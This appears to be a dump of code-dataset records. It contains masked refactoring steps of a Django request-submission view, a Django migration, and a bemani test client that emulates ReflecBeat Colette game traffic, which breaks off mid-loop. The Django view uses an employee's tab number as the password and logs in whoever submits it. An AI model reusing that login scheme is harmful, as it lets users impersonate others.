uid.tab_number)\n if user:\n login(request, user)\n req = Request()\n req.user = uid\n req.number = 
postdata.get('number', '000000000000')\n req.device = postdata.get('device', 'NoName')\n req.serial = postdata.get('serial', '')\n req.year = postdata.get('year', '----')\n req.save()\n c['saved'] = True\n else:\n c['form'] = form\n return HttpResponse(template.render(Context(c)))\n",
"step-3": "<mask token>\n__author__ = 'cm'\n<mask token>\n\n\ndef base_context(request):\n author = settings.ADMINS[0][0]\n version = settings.VERSION\n csrf_token = get_token(request)\n media_url = settings.MEDIA_URL\n app_name = _('Amortization & Expertise')\n path = request.path\n logout = False\n employee = None\n usr = request.user\n menu = MenuItem.objects.filter(for_staff=False).order_by('order')\n if usr.is_authenticated():\n logout = True\n employee = Employee.objects.filter(user=usr)\n if employee:\n employee = employee[0]\n if employee.user.is_staff:\n menu = MenuItem.objects.order_by('order')\n return locals()\n\n\ndef main(request):\n c = base_context(request)\n template = get_template('index.html')\n c['title'] = _('Request')\n form = RequestForm()\n user = request.user\n c['user'] = user\n if user.is_authenticated():\n e = Employee.objects.filter(user=user)\n if e:\n empl = e[0]\n form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl\n .tab_number, 'post': empl.post, 'cabinet': empl.cabinet})\n c['logout'] = True\n c['form'] = form\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = RequestForm(request.POST)\n if form.is_valid():\n empl = Employee.objects.filter(tab_number=postdata.get(\n 'tab_number', 0))\n if not empl:\n if user.is_authenticated():\n logout(request)\n username = postdata.get('fio', 'error!')\n password = postdata.get('tab_number', 0)\n User.objects.create_user(username, '[email protected]', password)\n new_user = authenticate(username=username, password=password)\n if new_user:\n login(request, new_user)\n empl = Employee()\n empl.tab_number = postdata.get('tab_number', 0)\n empl.fio = postdata.get('fio', 'error!')\n empl.user = new_user\n empl.post = postdata.get('post', '')\n empl.cabinet = postdata.get('cabinet', '0-000')\n empl.save()\n uid = empl\n else:\n uid = empl[0]\n user = authenticate(username=uid.user.username, password=\n uid.tab_number)\n if user:\n login(request, user)\n req = 
Request()\n req.user = uid\n req.number = postdata.get('number', '000000000000')\n req.device = postdata.get('device', 'NoName')\n req.serial = postdata.get('serial', '')\n req.year = postdata.get('year', '----')\n req.save()\n c['saved'] = True\n else:\n c['form'] = form\n return HttpResponse(template.render(Context(c)))\n",
"step-4": "from django.contrib.auth import logout, login, authenticate\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.middleware.csrf import get_token\nfrom django.template.context import Context\nfrom django.utils.translation import ugettext_lazy as _\nfrom account.models import Employee\nfrom amortization import settings\nfrom models import MenuItem\nfrom task.forms import RequestForm\nfrom task.models import Request, Task\n__author__ = 'cm'\nfrom django.template.loader import get_template\n\n\ndef base_context(request):\n author = settings.ADMINS[0][0]\n version = settings.VERSION\n csrf_token = get_token(request)\n media_url = settings.MEDIA_URL\n app_name = _('Amortization & Expertise')\n path = request.path\n logout = False\n employee = None\n usr = request.user\n menu = MenuItem.objects.filter(for_staff=False).order_by('order')\n if usr.is_authenticated():\n logout = True\n employee = Employee.objects.filter(user=usr)\n if employee:\n employee = employee[0]\n if employee.user.is_staff:\n menu = MenuItem.objects.order_by('order')\n return locals()\n\n\ndef main(request):\n c = base_context(request)\n template = get_template('index.html')\n c['title'] = _('Request')\n form = RequestForm()\n user = request.user\n c['user'] = user\n if user.is_authenticated():\n e = Employee.objects.filter(user=user)\n if e:\n empl = e[0]\n form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl\n .tab_number, 'post': empl.post, 'cabinet': empl.cabinet})\n c['logout'] = True\n c['form'] = form\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = RequestForm(request.POST)\n if form.is_valid():\n empl = Employee.objects.filter(tab_number=postdata.get(\n 'tab_number', 0))\n if not empl:\n if user.is_authenticated():\n logout(request)\n username = postdata.get('fio', 'error!')\n password = postdata.get('tab_number', 0)\n User.objects.create_user(username, '[email protected]', 
password)\n new_user = authenticate(username=username, password=password)\n if new_user:\n login(request, new_user)\n empl = Employee()\n empl.tab_number = postdata.get('tab_number', 0)\n empl.fio = postdata.get('fio', 'error!')\n empl.user = new_user\n empl.post = postdata.get('post', '')\n empl.cabinet = postdata.get('cabinet', '0-000')\n empl.save()\n uid = empl\n else:\n uid = empl[0]\n user = authenticate(username=uid.user.username, password=\n uid.tab_number)\n if user:\n login(request, user)\n req = Request()\n req.user = uid\n req.number = postdata.get('number', '000000000000')\n req.device = postdata.get('device', 'NoName')\n req.serial = postdata.get('serial', '')\n req.year = postdata.get('year', '----')\n req.save()\n c['saved'] = True\n else:\n c['form'] = form\n return HttpResponse(template.render(Context(c)))\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom django.contrib.auth import logout, login, authenticate\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom django.middleware.csrf import get_token\nfrom django.template.context import Context\nfrom django.utils.translation import ugettext_lazy as _\nfrom account.models import Employee\nfrom amortization import settings\nfrom models import MenuItem\nfrom task.forms import RequestForm\nfrom task.models import Request, Task\n\n__author__ = 'cm'\n\nfrom django.template.loader import get_template\n\ndef base_context(request):\n author = settings.ADMINS[0][0]\n version = settings.VERSION\n csrf_token = get_token(request)\n media_url = settings.MEDIA_URL\n app_name = _('Amortization & Expertise')\n path = request.path\n\n logout = False\n employee = None\n usr = request.user\n menu = MenuItem.objects.filter(for_staff=False).order_by('order')\n if usr.is_authenticated():\n logout = True\n employee = Employee.objects.filter(user=usr)\n if employee:\n employee = employee[0]\n if employee.user.is_staff:\n menu = MenuItem.objects.order_by('order')\n\n return locals()\n\ndef main(request):\n c = base_context(request)\n template = get_template(\"index.html\")\n c['title'] = _('Request')\n form = RequestForm()\n\n # if user is authenticated\n user = request.user\n c['user'] = user\n if user.is_authenticated():\n e = Employee.objects.filter(user=user)\n if e:\n empl = e[0]\n form = RequestForm(initial={'fio': empl.fio, 'tab_number': empl.tab_number, 'post': empl.post, 'cabinet': empl.cabinet})\n c['logout'] = True\n\n c['form'] = form\n\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = RequestForm(request.POST)\n if form.is_valid():\n empl = Employee.objects.filter(tab_number = postdata.get('tab_number', 0))\n if not empl:\n # django user ---\n if user.is_authenticated():\n # logout\n logout(request)\n username = postdata.get('fio', 'error!')\n 
password = postdata.get('tab_number', 0)\n User.objects.create_user(username, '[email protected]', password)\n\n # login\n new_user = authenticate(username=username, password=password)\n if new_user:\n login(request, new_user)\n\n # amortization user\n empl = Employee()\n empl.tab_number = postdata.get('tab_number', 0)\n empl.fio = postdata.get('fio', \"error!\")\n empl.user = new_user\n empl.post = postdata.get('post', '')\n empl.cabinet = postdata.get('cabinet', '0-000')\n empl.save()\n uid = empl\n else:\n uid = empl[0]\n user = authenticate(username=uid.user.username, password=uid.tab_number)\n if user:\n login(request, user)\n\n req = Request()\n req.user = uid\n req.number = postdata.get('number', '000000000000')\n req.device = postdata.get('device', 'NoName')\n req.serial = postdata.get('serial', '')\n req.year = postdata.get('year', '----')\n req.save()\n c['saved'] = True\n\n else:\n c['form'] = form\n\n return HttpResponse(template.render(Context(c)))",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.20 on 2019-04-11 03:58
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the obsolete ``status_perpindahan`` field from the ``transisi`` model."""

    # Must run after migration 0055 of the `produksi` app.
    dependencies = [
        ('produksi', '0055_auto_20190409_1316'),
    ]

    # Removing the field discards its stored column values.
    operations = [
        migrations.RemoveField(
            model_name='transisi',
            name='status_perpindahan',
        ),
    ]
|
normal
|
{
"blob_id": "1eb5df463bbd39002c5dbc3f88459e2f26d4b465",
"index": 8505,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('produksi', '0055_auto_20190409_1316')]\n operations = [migrations.RemoveField(model_name='transisi', name=\n 'status_perpindahan')]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('produksi', '0055_auto_20190409_1316')]\n operations = [migrations.RemoveField(model_name='transisi', name=\n 'status_perpindahan')]\n",
"step-5": "# -*- coding: utf-8 -*-\r\n# Generated by Django 1.11.20 on 2019-04-11 03:58\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('produksi', '0055_auto_20190409_1316'),\r\n ]\r\n\r\n operations = [\r\n migrations.RemoveField(\r\n model_name='transisi',\r\n name='status_perpindahan',\r\n ),\r\n ]\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import random
import time
from typing import Dict, List, Optional
from bemani.client.base import BaseClient
from bemani.protocol import Node
class ReflecBeatColette(BaseClient):
    """Traffic-generation client that exercises a ReflecBeat Colette server.

    Each ``verify_*`` method sends one game-protocol request and asserts that
    the server's response contains the node paths the real game expects.  The
    top-level :meth:`verify` drives a complete simulated play session: boot,
    card registration/lookup, profile read/write, lobby, puzzle comments,
    score saving and PASELI handling.
    """

    # Profile name written to (and expected back from) the server.
    NAME = 'TEST'

    def verify_pcb_boot(self, loc: str) -> None:
        """Send a ``pcb.boot`` for machine ``loc`` and validate the reply."""
        call = self.call_node()

        pcb = Node.void('pcb')
        pcb.set_attribute('method', 'boot')
        pcb.add_child(Node.string('lid', loc))
        call.add_child(pcb)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/pcb/sinfo/nm")
        self.assert_path(resp, "response/pcb/sinfo/cl_enbl")
        self.assert_path(resp, "response/pcb/sinfo/cl_h")
        self.assert_path(resp, "response/pcb/sinfo/cl_m")

    def verify_info_common(self) -> None:
        """Fetch common event/item-lock info and validate the reply."""
        call = self.call_node()

        info = Node.void('info')
        info.set_attribute('method', 'common')
        call.add_child(info)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/info/event_ctrl")
        self.assert_path(resp, "response/info/item_lock_ctrl")

    def verify_info_ranking(self) -> None:
        """Fetch the weekly/monthly/total ranking tables and validate them."""
        call = self.call_node()

        info = Node.void('info')
        info.set_attribute('method', 'ranking')
        info.add_child(Node.s32('ver', 0))
        call.add_child(info)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/info/ver")
        self.assert_path(resp, "response/info/ranking/weekly/bt")
        self.assert_path(resp, "response/info/ranking/weekly/et")
        self.assert_path(resp, "response/info/ranking/weekly/new/d/mid")
        self.assert_path(resp, "response/info/ranking/weekly/new/d/cnt")
        self.assert_path(resp, "response/info/ranking/monthly/bt")
        self.assert_path(resp, "response/info/ranking/monthly/et")
        self.assert_path(resp, "response/info/ranking/monthly/new/d/mid")
        self.assert_path(resp, "response/info/ranking/monthly/new/d/cnt")
        self.assert_path(resp, "response/info/ranking/total/bt")
        self.assert_path(resp, "response/info/ranking/total/et")
        self.assert_path(resp, "response/info/ranking/total/new/d/mid")
        self.assert_path(resp, "response/info/ranking/total/new/d/cnt")

    def verify_player_start(self, refid: str) -> None:
        """Start a game session for ``refid`` and validate the reply."""
        call = self.call_node()

        player = Node.void('player')
        player.set_attribute('method', 'start')
        player.add_child(Node.string('rid', refid))
        player.add_child(Node.u8_array('ga', [127, 0, 0, 1]))
        player.add_child(Node.u16('gp', 10573))
        player.add_child(Node.u8_array('la', [16, 0, 0, 0]))
        call.add_child(player)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/player/plyid")
        self.assert_path(resp, "response/player/start_time")
        self.assert_path(resp, "response/player/event_ctrl")
        self.assert_path(resp, "response/player/item_lock_ctrl")
        self.assert_path(resp, "response/player/lincle_link_4")
        self.assert_path(resp, "response/player/jbrbcollabo")
        self.assert_path(resp, "response/player/tricolettepark")

    def verify_player_delete(self, refid: str) -> None:
        """Delete the profile bound to ``refid`` and validate the reply."""
        call = self.call_node()

        player = Node.void('player')
        player.set_attribute('method', 'delete')
        player.add_child(Node.string('rid', refid))
        call.add_child(player)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/player")

    def verify_player_end(self, refid: str) -> None:
        """End the game session for ``refid`` and validate the reply."""
        call = self.call_node()

        player = Node.void('player')
        player.set_attribute('method', 'end')
        player.add_child(Node.string('rid', refid))
        call.add_child(player)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/player")

    def verify_player_succeed(self, refid: str) -> None:
        """Request carried-over profile data for ``refid`` and validate it."""
        call = self.call_node()

        player = Node.void('player')
        player.set_attribute('method', 'succeed')
        player.add_child(Node.string('rid', refid))
        call.add_child(player)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/player/name")
        self.assert_path(resp, "response/player/lv")
        self.assert_path(resp, "response/player/exp")
        self.assert_path(resp, "response/player/grd")
        self.assert_path(resp, "response/player/ap")
        self.assert_path(resp, "response/player/released")
        self.assert_path(resp, "response/player/mrecord")

    def verify_player_read(self, refid: str, location: str) -> List[Dict[str, int]]:
        """Read the profile for ``refid`` at ``location``.

        Validates the full profile node tree, checks that the profile name
        matches :attr:`NAME`, and returns the score records as a list of
        dicts keyed by id/chart/clear_type/achievement_rate/score/combo/
        miss_count.

        Raises:
            Exception: If the returned profile name does not match.
        """
        call = self.call_node()

        player = Node.void('player')
        player.set_attribute('method', 'read')
        player.add_child(Node.string('rid', refid))
        player.add_child(Node.string('lid', location))
        player.add_child(Node.s16('ver', 5))
        call.add_child(player)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/player/pdata/account/usrid")
        self.assert_path(resp, "response/player/pdata/account/tpc")
        self.assert_path(resp, "response/player/pdata/account/dpc")
        self.assert_path(resp, "response/player/pdata/account/crd")
        self.assert_path(resp, "response/player/pdata/account/brd")
        self.assert_path(resp, "response/player/pdata/account/tdc")
        self.assert_path(resp, "response/player/pdata/account/intrvld")
        self.assert_path(resp, "response/player/pdata/account/ver")
        self.assert_path(resp, "response/player/pdata/account/pst")
        self.assert_path(resp, "response/player/pdata/account/st")
        self.assert_path(resp, "response/player/pdata/base/name")
        self.assert_path(resp, "response/player/pdata/base/exp")
        self.assert_path(resp, "response/player/pdata/base/lv")
        self.assert_path(resp, "response/player/pdata/base/mg")
        self.assert_path(resp, "response/player/pdata/base/ap")
        self.assert_path(resp, "response/player/pdata/base/tid")
        self.assert_path(resp, "response/player/pdata/base/tname")
        self.assert_path(resp, "response/player/pdata/base/cmnt")
        self.assert_path(resp, "response/player/pdata/base/uattr")
        self.assert_path(resp, "response/player/pdata/base/hidden_param")
        self.assert_path(resp, "response/player/pdata/base/tbs")
        self.assert_path(resp, "response/player/pdata/base/tbs_r")
        self.assert_path(resp, "response/player/pdata/rival")
        self.assert_path(resp, "response/player/pdata/fav_music_slot")
        self.assert_path(resp, "response/player/pdata/custom")
        self.assert_path(resp, "response/player/pdata/config")
        self.assert_path(resp, "response/player/pdata/stamp")
        self.assert_path(resp, "response/player/pdata/released")
        self.assert_path(resp, "response/player/pdata/record")

        if resp.child_value('player/pdata/base/name') != self.NAME:
            raise Exception('Invalid name {} returned on profile read!'.format(resp.child_value('player/pdata/base/name')))

        scores = []
        for child in resp.child('player/pdata/record').children:
            if child.name != 'rec':
                continue

            score = {
                'id': child.child_value('mid'),
                'chart': child.child_value('ntgrd'),
                'clear_type': child.child_value('ct'),
                'achievement_rate': child.child_value('ar'),
                'score': child.child_value('scr'),
                'combo': child.child_value('cmb'),
                'miss_count': child.child_value('ms'),
            }
            scores.append(score)
        return scores

    def verify_player_write(self, refid: str, loc: str, scores: List[Dict[str, int]]) -> int:
        """Write a minimal profile plus per-stage score logs for ``refid``.

        Each entry in ``scores`` becomes one stage log. Returns the player's
        extid (``player/uid``) from the server response.
        """
        call = self.call_node()

        player = Node.void('player')
        call.add_child(player)
        player.set_attribute('method', 'write')
        pdata = Node.void('pdata')
        player.add_child(pdata)

        account = Node.void('account')
        pdata.add_child(account)
        account.add_child(Node.s32('usrid', 0))
        account.add_child(Node.s32('plyid', 0))
        account.add_child(Node.s32('tpc', 1))
        account.add_child(Node.s32('dpc', 1))
        account.add_child(Node.s32('crd', 1))
        account.add_child(Node.s32('brd', 1))
        account.add_child(Node.s32('tdc', 1))
        account.add_child(Node.string('rid', refid))
        account.add_child(Node.string('lid', loc))
        account.add_child(Node.u8('mode', 0))
        account.add_child(Node.s16('ver', 5))
        account.add_child(Node.bool('pp', True))
        account.add_child(Node.bool('ps', True))
        account.add_child(Node.s16('pay', 0))
        account.add_child(Node.s16('pay_pc', 0))
        account.add_child(Node.u64('st', int(time.time() * 1000)))

        base = Node.void('base')
        pdata.add_child(base)
        base.add_child(Node.string('name', self.NAME))
        base.add_child(Node.s32('exp', 0))
        base.add_child(Node.s32('lv', 1))
        base.add_child(Node.s32('mg', -1))
        base.add_child(Node.s32('ap', -1))
        base.add_child(Node.s32_array('hidden_param', [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]))
        base.add_child(Node.bool('is_tut', True))

        stglog = Node.void('stglog')
        pdata.add_child(stglog)
        index = 0
        for score in scores:
            log = Node.void('log')
            stglog.add_child(log)
            log.add_child(Node.s8('stg', index))
            log.add_child(Node.s16('mid', score['id']))
            log.add_child(Node.s8('ng', score['chart']))
            log.add_child(Node.s8('col', 0))
            log.add_child(Node.s8('mt', 7))
            log.add_child(Node.s8('rt', 0))
            log.add_child(Node.s8('ct', score['clear_type']))
            log.add_child(Node.s16('grd', 0))
            log.add_child(Node.s16('ar', score['achievement_rate']))
            log.add_child(Node.s16('sc', score['score']))
            log.add_child(Node.s16('jt_jst', 0))
            log.add_child(Node.s16('jt_grt', 0))
            log.add_child(Node.s16('jt_gd', 0))
            log.add_child(Node.s16('jt_ms', score['miss_count']))
            log.add_child(Node.s16('jt_jr', 0))
            log.add_child(Node.s16('cmb', score['combo']))
            log.add_child(Node.s16('exp', 0))
            log.add_child(Node.s32('r_uid', 0))
            log.add_child(Node.s32('r_plyid', 0))
            log.add_child(Node.s8('r_stg', 0))
            log.add_child(Node.s8('r_ct', -1))
            log.add_child(Node.s16('r_sc', 0))
            log.add_child(Node.s16('r_grd', 0))
            log.add_child(Node.s16('r_ar', 0))
            log.add_child(Node.s8('r_cpuid', -1))
            log.add_child(Node.s32('time', int(time.time())))
            log.add_child(Node.s8('decide', 0))
            index = index + 1

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/player/uid")
        return resp.child_value('player/uid')

    def verify_lobby_read(self, location: str, extid: int) -> None:
        """Read the matchmaking lobby for player ``extid`` and validate it."""
        call = self.call_node()

        lobby = Node.void('lobby')
        lobby.set_attribute('method', 'read')
        lobby.add_child(Node.s32('uid', extid))
        lobby.add_child(Node.u8('m_grade', 255))
        lobby.add_child(Node.string('lid', location))
        lobby.add_child(Node.s32('max', 128))
        lobby.add_child(Node.s32_array('friend', []))
        lobby.add_child(Node.u8('var', 5))
        call.add_child(lobby)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/lobby/interval")
        self.assert_path(resp, "response/lobby/interval_p")

    def verify_lobby_entry(self, location: str, extid: int) -> int:
        """Create a lobby entry for ``extid`` and return its entry id."""
        call = self.call_node()

        lobby = Node.void('lobby')
        lobby.set_attribute('method', 'entry')
        e = Node.void('e')
        lobby.add_child(e)
        e.add_child(Node.s32('eid', 0))
        e.add_child(Node.u16('mid', 79))
        e.add_child(Node.u8('ng', 0))
        e.add_child(Node.s32('uid', extid))
        e.add_child(Node.s32('uattr', 0))
        e.add_child(Node.string('pn', self.NAME))
        e.add_child(Node.s16('mg', 255))
        e.add_child(Node.s32('mopt', 0))
        e.add_child(Node.s32('tid', 0))
        e.add_child(Node.string('tn', ''))
        e.add_child(Node.s32('topt', 0))
        e.add_child(Node.string('lid', location))
        e.add_child(Node.string('sn', ''))
        e.add_child(Node.u8('pref', 51))
        e.add_child(Node.s8('stg', 4))
        e.add_child(Node.s8('pside', 0))
        e.add_child(Node.s16('eatime', 30))
        e.add_child(Node.u8_array('ga', [127, 0, 0, 1]))
        e.add_child(Node.u16('gp', 10007))
        e.add_child(Node.u8_array('la', [16, 0, 0, 0]))
        e.add_child(Node.u8('ver', 5))
        lobby.add_child(Node.s32_array('friend', []))
        call.add_child(lobby)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/lobby/interval")
        self.assert_path(resp, "response/lobby/interval_p")
        self.assert_path(resp, "response/lobby/eid")
        self.assert_path(resp, "response/lobby/e/eid")
        self.assert_path(resp, "response/lobby/e/mid")
        self.assert_path(resp, "response/lobby/e/ng")
        self.assert_path(resp, "response/lobby/e/uid")
        self.assert_path(resp, "response/lobby/e/uattr")
        self.assert_path(resp, "response/lobby/e/pn")
        self.assert_path(resp, "response/lobby/e/mg")
        self.assert_path(resp, "response/lobby/e/mopt")
        self.assert_path(resp, "response/lobby/e/tid")
        self.assert_path(resp, "response/lobby/e/tn")
        self.assert_path(resp, "response/lobby/e/topt")
        self.assert_path(resp, "response/lobby/e/lid")
        self.assert_path(resp, "response/lobby/e/sn")
        self.assert_path(resp, "response/lobby/e/pref")
        self.assert_path(resp, "response/lobby/e/stg")
        self.assert_path(resp, "response/lobby/e/pside")
        self.assert_path(resp, "response/lobby/e/eatime")
        self.assert_path(resp, "response/lobby/e/ga")
        self.assert_path(resp, "response/lobby/e/gp")
        self.assert_path(resp, "response/lobby/e/la")
        self.assert_path(resp, "response/lobby/e/ver")
        return resp.child_value('lobby/eid')

    def verify_lobby_delete(self, eid: int) -> None:
        """Delete lobby entry ``eid`` and validate the reply."""
        call = self.call_node()

        lobby = Node.void('lobby')
        lobby.set_attribute('method', 'delete')
        lobby.add_child(Node.s32('eid', eid))
        call.add_child(lobby)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/lobby")

    def verify_pzlcmt_read(self, extid: int) -> None:
        """Read puzzle comments and confirm the one we posted is present.

        Raises:
            Exception: If our comment (posted by :meth:`verify_pzlcmt_write`)
                is missing or has the wrong name/text.
        """
        call = self.call_node()

        info = Node.void('info')
        info.set_attribute('method', 'pzlcmt_read')
        info.add_child(Node.s32('uid', extid))
        info.add_child(Node.s32('tid', 0))
        info.add_child(Node.s32('time', 0))
        info.add_child(Node.s32('limit', 30))
        call.add_child(info)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/info/comment/time")
        self.assert_path(resp, "response/info/c/uid")
        self.assert_path(resp, "response/info/c/name")
        self.assert_path(resp, "response/info/c/icon")
        self.assert_path(resp, "response/info/c/bln")
        self.assert_path(resp, "response/info/c/tid")
        self.assert_path(resp, "response/info/c/t_name")
        self.assert_path(resp, "response/info/c/pref")
        self.assert_path(resp, "response/info/c/time")
        self.assert_path(resp, "response/info/c/comment")
        self.assert_path(resp, "response/info/c/is_tweet")

        # Verify we posted our comment earlier
        found = False
        for child in resp.child('info').children:
            if child.name != 'c':
                continue
            if child.child_value('uid') == extid:
                name = child.child_value('name')
                comment = child.child_value('comment')
                if name != self.NAME:
                    raise Exception('Invalid name \'{}\' returned for comment!'.format(name))
                if comment != 'アメ〜〜!':
                    raise Exception('Invalid comment \'{}\' returned for comment!'.format(comment))
                found = True

        if not found:
            raise Exception('Comment we posted was not found!')

    def verify_pzlcmt_write(self, extid: int) -> None:
        """Post a puzzle comment as player ``extid`` and validate the reply."""
        call = self.call_node()

        info = Node.void('info')
        info.set_attribute('method', 'pzlcmt_write')
        info.add_child(Node.s32('uid', extid))
        info.add_child(Node.string('name', self.NAME))
        info.add_child(Node.s16('icon', 0))
        info.add_child(Node.s8('bln', 0))
        info.add_child(Node.s32('tid', 0))
        info.add_child(Node.string('t_name', ''))
        info.add_child(Node.s8('pref', 51))
        info.add_child(Node.s32('time', int(time.time())))
        info.add_child(Node.string('comment', 'アメ〜〜!'))
        info.add_child(Node.bool('is_tweet', True))
        call.add_child(info)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/info")

    def verify_jbrbcollabo_save(self, refid: str) -> None:
        """Save Jubeat/ReflecBeat collaboration data and validate the reply."""
        call = self.call_node()

        jbrbcollabo = Node.void('jbrbcollabo')
        jbrbcollabo.set_attribute('method', 'save')
        jbrbcollabo.add_child(Node.string('ref_id', refid))
        jbrbcollabo.add_child(Node.u16('cre_count', 0))
        call.add_child(jbrbcollabo)

        # Swap with server
        resp = self.exchange('', call)

        # Verify that response is correct
        self.assert_path(resp, "response/jbrbcollabo")

    def verify(self, cardid: Optional[str]) -> None:
        """Run a full simulated session against the server under test.

        When ``cardid`` is ``None`` a fresh card is generated and the
        registration, score-saving and lobby flows are exercised; otherwise
        only the lookup/pin flows for the existing card are checked.
        """
        # Verify boot sequence is okay
        self.verify_services_get(
            expected_services=[
                'pcbtracker',
                'pcbevent',
                'local',
                'message',
                'facility',
                'cardmng',
                'package',
                'posevent',
                'pkglist',
                'dlstatus',
                'eacoin',
                'lobby',
                'ntp',
                'keepalive'
            ]
        )
        paseli_enabled = self.verify_pcbtracker_alive()
        self.verify_message_get()
        self.verify_package_list()
        location = self.verify_facility_get()
        self.verify_pcbevent_put()
        self.verify_pcb_boot(location)
        self.verify_info_common()

        # Verify card registration and profile lookup
        if cardid is not None:
            card = cardid
        else:
            card = self.random_card()
            print("Generated random card ID {} for use.".format(card))

        # extid is only known when we create a profile below; lobby and
        # comment checks that require it are skipped for existing cards.
        extid: Optional[int] = None

        if cardid is None:
            self.verify_cardmng_inquire(card, msg_type='unregistered', paseli_enabled=paseli_enabled)
            ref_id = self.verify_cardmng_getrefid(card)
            if len(ref_id) != 16:
                raise Exception('Invalid refid \'{}\' returned when registering card'.format(ref_id))
            if ref_id != self.verify_cardmng_inquire(card, msg_type='new', paseli_enabled=paseli_enabled):
                raise Exception('Invalid refid \'{}\' returned when querying card'.format(ref_id))
            # Always get a player start, regardless of new profile or not
            self.verify_player_start(ref_id)
            self.verify_player_delete(ref_id)
            self.verify_player_succeed(ref_id)
            extid = self.verify_player_write(
                ref_id,
                location,
                [{
                    'id': 0,
                    'chart': 0,
                    'clear_type': -1,
                    'achievement_rate': 0,
                    'score': 0,
                    'combo': 0,
                    'miss_count': 0,
                }]
            )
        else:
            print("Skipping new card checks for existing card")
            ref_id = self.verify_cardmng_inquire(card, msg_type='query', paseli_enabled=paseli_enabled)

        # Verify pin handling and return card handling
        self.verify_cardmng_authpass(ref_id, correct=True)
        self.verify_cardmng_authpass(ref_id, correct=False)
        if ref_id != self.verify_cardmng_inquire(card, msg_type='query', paseli_enabled=paseli_enabled):
            raise Exception('Invalid refid \'{}\' returned when querying card'.format(ref_id))

        if extid is not None:
            # Verify lobby functionality
            self.verify_lobby_read(location, extid)
            eid = self.verify_lobby_entry(location, extid)
            self.verify_lobby_delete(eid)

            # Verify puzzle comment read and write
            self.verify_pzlcmt_write(extid)
            self.verify_pzlcmt_read(extid)
        else:
            # Fix: previously 'extid' was referenced unconditionally here and
            # raised NameError when verifying an existing card.
            print("Skipping lobby and comment checks for existing card")

        # Verify Jubeat/ReflecBeat collabo save
        self.verify_jbrbcollabo_save(ref_id)

        if cardid is None:
            # Verify score saving and updating
            for phase in [1, 2]:
                if phase == 1:
                    dummyscores = [
                        # An okay score on a chart
                        {
                            'id': 1,
                            'chart': 1,
                            'clear_type': 2,
                            'achievement_rate': 7543,
                            'score': 432,
                            'combo': 123,
                            'miss_count': 5,
                        },
                        # A good score on an easier chart of the same song
                        {
                            'id': 1,
                            'chart': 0,
                            'clear_type': 4,
                            'achievement_rate': 9876,
                            'score': 543,
                            'combo': 543,
                            'miss_count': 0,
                        },
                        # A bad score on a hard chart
                        {
                            'id': 3,
                            'chart': 2,
                            'clear_type': 2,
                            'achievement_rate': 1234,
                            'score': 123,
                            'combo': 42,
                            'miss_count': 54,
                        },
                        # A terrible score on an easy chart
                        {
                            'id': 3,
                            'chart': 0,
                            'clear_type': 2,
                            'achievement_rate': 1024,
                            'score': 50,
                            'combo': 12,
                            'miss_count': 90,
                        },
                    ]
                if phase == 2:
                    dummyscores = [
                        # A better score on the same chart
                        {
                            'id': 1,
                            'chart': 1,
                            'clear_type': 3,
                            'achievement_rate': 8765,
                            'score': 469,
                            'combo': 468,
                            'miss_count': 1,
                        },
                        # A worse score on another same chart
                        {
                            'id': 1,
                            'chart': 0,
                            'clear_type': 2,
                            'achievement_rate': 8765,
                            'score': 432,
                            'combo': 321,
                            'miss_count': 15,
                            'expected_score': 543,
                            'expected_clear_type': 4,
                            'expected_achievement_rate': 9876,
                            'expected_combo': 543,
                            'expected_miss_count': 0,
                        },
                    ]

                self.verify_player_write(ref_id, location, dummyscores)
                scores = self.verify_player_read(ref_id, location)
                for expected in dummyscores:
                    actual = None
                    for received in scores:
                        if received['id'] == expected['id'] and received['chart'] == expected['chart']:
                            actual = received
                            break

                    if actual is None:
                        raise Exception("Didn't find song {} chart {} in response!".format(expected['id'], expected['chart']))

